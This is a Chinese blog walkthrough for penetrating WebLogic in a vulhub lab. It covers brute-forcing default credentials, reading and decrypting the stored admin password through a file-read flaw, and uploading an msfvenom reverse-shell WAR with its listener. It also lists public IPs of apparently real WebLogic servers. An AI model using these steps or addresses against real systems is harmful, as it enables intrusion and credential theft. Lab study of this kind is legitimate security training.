当前位置: 首页 > news >正文

电子商务做网站设计seo综合查询国产

电子商务做网站设计,seo综合查询国产,电销防封号系统,网站开发学习网站weblogic WebLogic 是 Oracle 公司开发的应用服务器,主要用作开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的 Java 应用服务器。它在历史上曾出现过多个安全漏洞,其中包括弱口令、任意文件上传、SSRF、反序列化漏洞等 常见版本&a…

weblogic

WebLogic 是 Oracle 公司开发的应用服务器,主要用作开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的 Java 应用服务器。它在历史上曾出现过多个安全漏洞,其中包括弱口令、任意文件上传、SSRF、反序列化漏洞等

常见版本:

WebLogic Server 10.x  http://94.101.140.201:7001/
WebLogic Server 11.x   http://64.44.157.94:7001/
较为少见 12 和 8 版本
12: http://124.128.249.189:7001/
8: http://129.126.221.67:7001/

默认服务端口:7001

vulhub靶场使用

vulhub:多个靶场的集合

1.关闭防火墙

systemctl stop firewalld.service 

2.关闭selinux系统防护[详细见主页]

setenforce 0

3.开启docker服务

systemctl restart docker.service 

4.进入vulhub靶场目录

cd /var/local/vulhub-master/weblogic/weak_password

5.开启靶场[后台开启]

docker-compose up -d

6.查看靶场信息

[root@localhost weak_password]# docker ps
CONTAINER ID   IMAGE                           COMMAND              CREATED          STATUS          PORTS                                                                                  NAMES
5ebeb02ea02a   vulhub/weblogic:10.3.6.0-2017   "startWebLogic.sh"   54 minutes ago   Up 54 seconds   0.0.0.0:5556->5556/tcp, :::5556->5556/tcp, 0.0.0.0:7001->7001/tcp, :::7001->7001/tcp   weak_password_weblogic_

7.访问靶场 

http://192.168.10.5:7001/

8.关闭靶场[切换至靶场目录下]

 docker-compose stop

[root@localhost weak_password]# docker-compose stop
Stopping weak_password_weblogic_1 ... done

9.切换靶场 [报错重复步骤1~3]

[root@localhost weak_password]# cd ..
[root@localhost weblogic]# ls
CVE-2017-10271  CVE-2018-2628  CVE-2018-2894  CVE-2020-14882  CVE-2023-21839  ssrf  weak_password
[root@localhost weblogic]# cd ssrf/
[root@localhost ssrf]# docker-compose up -d
Starting ssrf_redis_1 ... done
Starting ssrf_weblogic_1 ... done
[root@localhost ssrf]# 

弱口令爆破

weblogic弱口令:

用户名密码
systempassword
weblogicweblogic
adminsecruity
joepassword
marypassword
systemsercurity
wlcsystemwlcsystem
weblogicOracle@123

1.抓取数据包

2.发送攻击者模块,攻击模式:pitchfork

3.标记载荷,导入弱口令

 

4.开始爆破

 5.拿到用户信息并登录

任意文件读取[应用程序漏洞读取weblogic密码] 

通过漏洞读取weblogic密钥及密文,使用AES解密出后台密码

密文绝对路径:
/root/Oracle/Middleware/user_projects/domains/base_domain/security/Se
rializedSystemIni.dat
密钥绝对路径:
/root/Oracle/Middleware/user_projects/domains/base_domain/config/con
fig.xml

漏洞接口路径:

http://192.168.10.5:7001/hello/file.jsp?path=/etc/passwd

使用bp获取密文并解密

1.抓取接口数据包
2.改为密码密文路径,获取响应

        请求:

        响应:

3.响应视图修改为 Hex ,选中乱码部分的16进制数据,右键保存为.dat文件

 

4.读取配置文件,保存密钥

config.xml是base_domain的全局配置文件

其中<node-manager-password-encrypted>标签的值为"密钥"

5.下载解密工具,进行解密
地址:https://github.com/TideSec/Decrypt_Weblogic_Password
工具路径:Decrypt_Weblogic_Password-master\Tools5-weblogic_decrypt

扩展:使用.bat脚本快速启动工具

创建.bat文件将其保存至工具目录

@echo off
echo Starting the weblogic_decrypt.jar application...
java -jar weblogic_decrypt.jar
echo Application has ended. Press any key to exit.
pause > nul

建立反弹连接

1.kali使用msf生成木马

msfvenom -p java/meterpreter/reverse_tcp lhost=攻击者ip lport=4444 -f war -o java.war

2.将木马部署入服务器

点击左侧 部署->安装->上载文件->上传war包->(全部下一步)-> 完成

 

3.监听连接端口

msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.10.128
set LPORT 4444
exploit

 

4.访问木马路径,建立连接

http://192.168.10.5:7001/java

http://www.tj-hxxt.cn/news/73394.html

相关文章:

  • 河间网站建设价格头条发布视频成功显示404
  • 爱网购的女人专业网站优化培训
  • 肇庆市电商网站建设价格针对大学生推广引流
  • 广州美容网站建设如何优化网络速度
  • 网站建设seo规范成都网站制作关键词推广排名
  • 扁平化网站建设公司网站服务器信息查询
  • 网络游戏网站制作优化方案官网
  • 威海网站建设 孔网络营销的未来发展趋势论文
  • 业余做衣服的网站弹窗广告最多的网站
  • 学校网站怎么建设网络营销软文案例
  • 做房地产什么网站好模板建站价格
  • 如何防止网站被复制郑州网络营销公司哪家好
  • 中投中原建设有限公司官方网站中国万网域名查询
  • 做博彩类的网站日本预测比分
  • 邗江区做网站网站运营方案
  • 赚钱网站有哪些站长工具seo综合查询可以访问
  • 无锡工程建设监察支队网站国外搜索引擎网站
  • 值得买网站模板百度seo外包
  • 电影网站怎么做流量优化大师官网下载安装
  • 做的比较好的游戏网站广州网站建设推广专家
  • 小白node怎么做网站深圳高端seo外包公司
  • 怎么做电商平台网站seowhy培训
  • js做示爱网站例子seo的主要分析工具
  • 开封做网站哪家好职业技术培训
  • 域名访问网站是什么意思今天重大新闻头条
  • 自己如何做网站徐州seo排名收费
  • 平远县建设工程交易中心网站百度网址链接
  • 网站可以做多少个网页北京百度seo点击器
  • 房天下二手房官网seo搜索引擎优化推广专员
  • 上海网站建设 浦东朋友圈广告30元 1000次